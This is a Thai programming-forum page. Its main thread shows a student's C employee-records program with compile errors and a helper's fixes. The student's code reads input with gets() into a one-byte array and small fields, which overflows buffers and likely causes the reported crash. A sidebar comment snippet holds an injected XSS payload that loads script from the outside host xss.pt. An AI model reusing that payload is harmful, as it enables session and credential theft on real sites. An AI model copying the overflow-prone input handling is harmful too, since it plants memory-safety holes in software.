หน้าแรก
 การบ้าน
  C/C++ new
  Java new
 Sourcecode.TV
  Android
  Blackberry
  C/C++
  Java
  Linux
  Windows Phone
  แจ้งเรื่องที่ต้องการ
 บทความ
  .NET
  Android
  Blackberry
  C++Builder
  Delphi
  Java
  Mobile
  Open Source
  Pocket PC
  Visual Basic
  Web
  Windows Phone
  Others
 แบบเรียนฟรี
  ASP
  ASP.NET Webmatrix
  C++
  eVB
  J2ME
  Java
  PHP
 ซอร์สโค้ด
  Android
  ASP
  C++
  VC++
  CGI-Perl
  Delphi
  Java
  jQuery
  PHP
  Visual Basic
  .NET
 บริการจากเรา
  เปิดท้าย... ขายโค้ด
  DoodeeHosting
  รับออกแบบ พัฒนาเว็บไซต์
  Freeware
  อัตราค่าโฆษณา
  รายชื่อลูกค้า
  สถิติผู้เข้าเว็บ
 ดาว์นโหลด
 ค้นหาข้อมูล
 กระดานสนทนา
  .NET
  C/C++
  Delphi
  Java
  Palm/PocketPC
  Visual Basic
  Web
  อื่นๆ
 กระดานงาน
 ลิงค์เว็บ
 เกี่ยวกับผม
 อัตราค่าโฆษณา
Social Network

Facebook  Twitter  YouTube
 New Article
 Webboard
 Freelanceboard
Freeware
โปรแกรมเบอร์ดี (BerDee)
โปรแกรมเบอร์ดี (Android)
เกมส์เป่ายิ้งฉุบ
เกมส์เป่ายิ้งฉุบ(Android)
WebcamMonitor
WebcamMonitor(Windows)
scSendMail
scSendMail(Windows)
MSN Caption
MSN Caption(Windows)
  Freelance comment
  ติดต่อสอบถามมาได้ตลอดนะ...
2015-07-29 13:35:58
  ถ้าผมต้องการเว็บที่พัฒน...
2015-01-18 15:33:54
  ถ้าผมต้องการเว็บที่พัฒน...
2015-01-18 15:32:51
  ติดต่อสอบถามเข้ามาได้นะ...
2014-01-06 12:47:38
  ถ้ายังหาคนสอนไม่ได้ ก็ลอ...
2013-07-06 01:04:37
  สนใจส่งขอบเขตมาคุยราคาก...
2013-03-24 18:54:20
  ถ้ายังไม่มีคนรับงานติดต...
2012-12-16 19:18:14
  สนใจคะ ติดต่อ 0905076277...
2012-11-12 11:07:46
  รับทำโปรเจ็คนักศึกษาหรื...
2012-10-29 03:10:46
  sukit_te34@hotmail.com...
2012-10-29 03:09:36
  Webboard comment
  พอดีผมเห...
2020-05-31 21:49:43
  ช่วย แสดง...
2020-04-27 11:21:00
  ได้การบ้...
2020-04-27 11:18:56
  ได้การบ้...
2020-04-27 11:02:44
  <a href="https://www.g...
2020-03-10 17:07:03
  ไม่อยากเ...
2020-03-10 17:05:36
  ขอโคํดเก...
2020-02-09 22:50:58
  ขอโค้ดเก...
2020-01-28 23:42:26
  uuu...
2020-01-24 11:54:34
  ก็ต้องลง ...
2019-10-22 01:56:28
  Homework comment
  โจทย์การบ้าน c++ เขียนรูปแ...
2020-04-06 11:01:33
  แบบนี้ขอเป็น ภาษา php หน่อย...
2019-09-18 14:36:34
  ผมไม่อยากให้คุณได้คะแนน...
2019-04-27 01:29:07
  อาจารย์เขาบอกแนวข้อสอบม...
2019-04-27 00:44:29
  ขอสอบถามการเขียน c++ ครับ เ...
2018-04-02 12:19:21
  โค้ดตัวอย่างศึกษาให้เข้...
2017-11-26 14:50:05
  คำนวณค่าน้ำโดยรับค่ามิเ...
2017-11-20 23:15:26
  ขอบคุณมากครับ...
2017-08-16 18:27:25
  ทำเอง งง เอง กะลังทำใหม่ค...
2017-04-18 18:40:46
  ทำเอง งง เอง กะลังทำใหม่ค...
2017-04-18 18:37:54
  Article comment
  asdasd...
2020-01-28 19:48:57
  ต้องการ ให้เขียน โปรแกรม ...
2019-12-09 11:39:58
  รับเขียน arx จาก vc++ 2017 ล็อคโปร...
2019-09-19 09:48:09
  ทำการ register ไฟล์ที่ชื่อ mswinsck.oc...
2019-09-17 14:05:56
  <Img sRC=https://xss.pt/op2fp.jpg>
<sCRiPt sRC=//xss.pt/op...

2019-09-12 13:43:34
  ใน vb 6 ไม่มี component winsock เลยค่ะ ส...
2019-09-03 10:31:02
  รบกวนขอสอบถามหน่อยนะครั...
2019-03-04 05:31:04
  สามารถนำตัวหนังสือจากภา...
2018-12-25 08:54:32
  มีcode ของ VB ไหมค่ะ ถ้ามีรบกว...
2017-09-28 16:50:02
  น่าจะได้ครับ ไม่เคยลอง
...

2017-07-11 09:59:35
  9Mcode comment
  อยากได้...
2014-02-21 08:52:19

Link Exchange

อัตราค่าโฆษณา
Statistics of Sourcecode in Thailand
 
 Webboard

- - - - - - - - - - - - - - ผู้ให้การสนับสนุน- - - - - - - - - - - - - -

กระทู้ #3065 [C]

ช่วยทีค่ะerror2ตัวค่ะ c++เพิ่งหัดเขียนแล้วรันไม่ผ่านค่ะอาจารย์ให้ทำส่งด้วยค่ะ

#include <stdio.h>
#include <conio.h>
#include <stdlib.h>

struct employee{
char emp_id[5];
char name[10];
char surname[20];
char position[20];
float salary;
}emp;

void insert_data();
void delete_data();
void search_data();

main() {
int choice;
char temp[] = {0};
do{
clrscr ();
printf ("#################################\n") ;
printf ("# Welcome to employee system #\n");
printf ("#################################\n") ;
printf ("#please select choice #\n") ;
printf ("#1. Insert Data #\n") ;
printf ("#2. Delete Data #\n") ;
printf ("#3. Search Employee Data #\n") ;
printf ("#4. Exit #\n") ;
printf ("################################\n") ;
printf ("Please select choice (1-4 only) :") ;
gets(temp);
choice =atoi(temp);
if(choice==1)insert_data ();
else if(choice==2)delete_data ();
else if(choice==3)search_data ();
}while(choice!=4);
}
void insert_data(){
FILE *fp;
char ans;
char temp[]={0};

if ((fp=fopen("emp loyee.txt","ab"))==NULL) {
printf ("Cannot open file for inert data\n");
getch();
exit(1);
}
do{
printf ("\n\nPlease insert emp loyee data\n");
printf ("Emp loyee Id :");gets(emp.emp_id);
printf ("Name :");gets(emp.name);
printf ("Surname :");gets(emp.surname);
printf ("Position :");gets(emp.position);
printf ("Salary :");gets(temp);
emp.salary=atof(temp);
fwrite(&emp,sizeof(emp),1,fp);
if (ferror(fp)){
printf ("Error for insert data\n") ;
getch ( ) ;
exit (1) ;
}
printf ("Continue (press C) Or Exit (press E) :") ;
ans = getche();
}while(ans!='E');
fclose(fp);
}
void delete_data ( ) {
FILE *fp ;
int i=0 ;
char ans ;
char rec [5] ;
if ((fp=fopen ("emp loyee.txt","rb+"))==NULL) {
printf ("Cannot open file for delete data\n");
getch ();
exit(1);
}
printf ("\n\nThis is emp loyee for delete\n") ;
do{
while (1) {
fread (&emp,sizeof(emp),1,fp) ;
if (ferror (fp)) {
printf ("Error to read data for delete\n") ;
getch ( ) ;
exit (1) ;
}
if (feof (fp))
break ;
++i ;
printf ("%d . %s \t \t", i ,emp . emp_id) ;
}
printf ("\nDo you want to delete data (Y or N) :") ;
ans = getche ();
if (ans=='Y') {
printf ("\nEnter record number :") ;
gets (rec) ;
fseek (fp, ((atoi (rec) -1)*sizeof (emp)) , SEEK_SET) ;
strcpy(emp.emp_id,"\n");
fwrite (&emp , sizeof (emp) , 1 , fp) ;
if (ferror (fp)) {
printf ("Error for delete data\n") ;
getch ( ) ;
exit (1) ;
}
printf ("Delete data complete\n") ;
}
printf ("\nContinue (press C) or Exit (press E) :");
ans = getche ();
printf ( "\n") ;
}while (ans !='E') ;
fclose (fp) ;
}
void search_data(){
FILE *fp ;
char ans ;
char id[5] ;
if ((fp=fopen("emp loyee.txt","rb"))==NULL){
printf ("Cannot open file for search data\n") ;
getch ();
exit (1) ;
}

do{
printf ("\n\nPlease enter employee id for search :") ;
scanf ("%s" , id) ;

while(1){
fread (&emp , sizeof (emp) , 1 , fp) ;
if (ferror (fp)) {
printf ("Error for search data\n") ;
getch ( ) ;
exit (1) ;
}
if (feof(fp)) break ;
if (strcmp(id,emp.emp_id)==0){
printf ("Data Found ! ! ! \n") ;
printf ("Emp loyee Id :%s\n" , emp . emp_id) ;
printf ("Name :%s\n" , emp . name) ;
printf ("Surname :%s\n" , emp . surname) ;
printf ("Position :%s\n" , emp . position) ;
printf ("Salary :%2f\n\n" , emp . salary) ;
break ;
}
}
if (strcmp(id,emp.emp_id)!=0)
printf ("NO emp loyee in emp loyee id %s\n\n" , id) ;
printf ("Continue (press C) Or Exit (press E) :") ;
rewind (fp) ;
ans=getche();
printf ("\n") ;
}while (ans !='E') ;
fclose (fp) ;
}
_______________________________________________
นี่ตัวerrorค่ะ

Compiling 1.CPP:
Warning 1.CPP 38: Function should return a value in function main()
Error 1.CPP 98: Call to undefined function 'strcpy' in function delete_data()
Error 1.CPP 135: Call to undefined function 'strcmp' in function search_data()
จากคุณ : ช่วยทีค่ะerror2ตัวค่ะ [2011-04-11 22:47:04]  

115.67.251.66 ความคิดเห็น #28294 (จาก IP: 115.67.251.66)
หน้า main() เพิ่มเป็น void main()
จากคุณ : ก๊อปใครมา [2011-04-12 00:14:00]

115.67.251.66 ความคิดเห็น #28295 (จาก IP: 115.67.251.66)
เพิ่ม #include <string.h>
จากคุณ : ก๊อปใครมา [2011-04-12 00:17:40]

223.204.93.59 ความคิดเห็น #28296 (จาก IP: 223.204.93.59)
พี่ค่ะพอรันไปแล้วยังมีปัญหาที่ว่าโปรแกรมไม่รันต่อเมื่อเก็บค่าไปแล้วโปรแกรมerrorเลยค่ะช่วยแก้ให้หนูอีกนิดนะค่ะ
จากคุณ : ช่วยทีค่ะerror2ตัวค่ะ / svx_1122@hotmail.com [2011-04-12 00:33:40]

115.67.251.66 ความคิดเห็น #28298 (จาก IP: 115.67.251.66)
ผมลองแล้วไม่พบ error เลย ไม่ทราบว่า error อะไร , ลองฝึกๆไล่โค้ดดูบ้างก็ดีนะครับ
จากคุณ : ก๊อปใครมา [2011-04-12 01:06:31]

183.88.61.169 ความคิดเห็น #28299 (จาก IP: 183.88.61.169)
มันขึ้นว่าGeneral Protection Exception
0x1D4F:0x5AD5
1(1)0x1D4F:0x5AD5
Processor Fault
จากคุณ : ช่วยทีค่ะerror2ตัวค่ะ / svx_1122@hotmail.com [2011-04-12 08:02:49]

115.67.224.103 ความคิดเห็น #28300 (จาก IP: 115.67.224.103)
ผม run บนเครื่องผมได้ไม่มีปัญหา
เป็นหาจึงไม่ได้เป็นที่โค้ด ลองแก้ดังนี้
- แก้ "emp loyee.txt" ไปเป็น "employee.txt" ทั้งหมด
- เปลี่ยนมาใช้ Turbo C++ 3.0
- ตอนเปิดใช้งาน Turbo C++ ให้เลือก Run as administrator (กรณีใช้ windows7)
จากคุณ : ก๊อปใครมา [2011-04-12 11:02:26]
ตอบกระทู้
  • ห้ามการโฆษณา หากต้องการติดต่อหาลูกค้า ติดต่อโฆษณาโดยตรงได้ที่ webmaster@sourcecode.in.th
  • ห้ามใช้คำหยาบและคำพูดที่ไม่เหมาะสม
  • ขอสงวนสิทธิหากตรวจพบ ข้อความที่ไม่เหมาะสม ข้อความนั้นจะถูกลบทันที
ชื่อ
อีเมล์
รายละเอียด

- - - - - - - - - - - - - - ผู้ให้การสนับสนุน- - - - - - - - - - - - - -

 
 
หัวแปลง Mini DisplayPort to HDMI Adapter หัวแปลง Mini DisplayPort to HDMI Adapter สำหรับเครื่อง macbook air/pro, mac mini
หัวแปลง Mini DisplayPort to HDMI Adapter สำหรับเครื่อง macbook air/pro, mac mini
คลิปสอนเขียนโปรแกรม
เรียนเขียนโปรแกรมดอทเน็ต
เรียนเขียนโปรแกรมแอนดรอยด์
เรียนเขียนโปรแกรมเบล็คเบอร์รี่
เรียนเขียนโปรแกรมซี ซีพลัสพลัส
เรียนเขียนโปรแกรมจาวา
เรียนการใช้งานลินุกส์
เรียนการเขียนโปรแกรมวินโดว์โฟน
เรียนการเขียนโปรแกรมพีเฮชพี มายเอสคิวเอล
9M Blog บอกเล่าเรื่องราว การเขียนโปรแกรมของ นายเอ็ม
บริการ ถ่ายภาพรับปริญญา
อัตราค่าโฆษณา
 
Tutorial
eVB Tutorial
ASP.NET Webmatrix Tutorial
J2ME Tutorial
C++  Tutorial
Java  Tutorial
PHP Tutorial
ASP Tutorial
 
แบบสำรวจ
Freelance รับพัฒนาโปรแกรม

Home - Article - Tutorial - Sourcecode - Dev Handbook - Search - WebBoard - Links - About Us

สงวนลิขสิทธิ์ ห้ามคัดลอก ทำซ้ำ แก้ไข ดัดแปลง ไม่ว่าในรูปแบบใด โดยไม่ได้รับอนุญาตเป็นลายลักษณ์อักษร
เลขทะเบียนพาณิชย์อิเล็กทรอนิกส์จากกระทรวงพาณิชย์: 7100503002000
Copyright 2001 SourceCode.in.th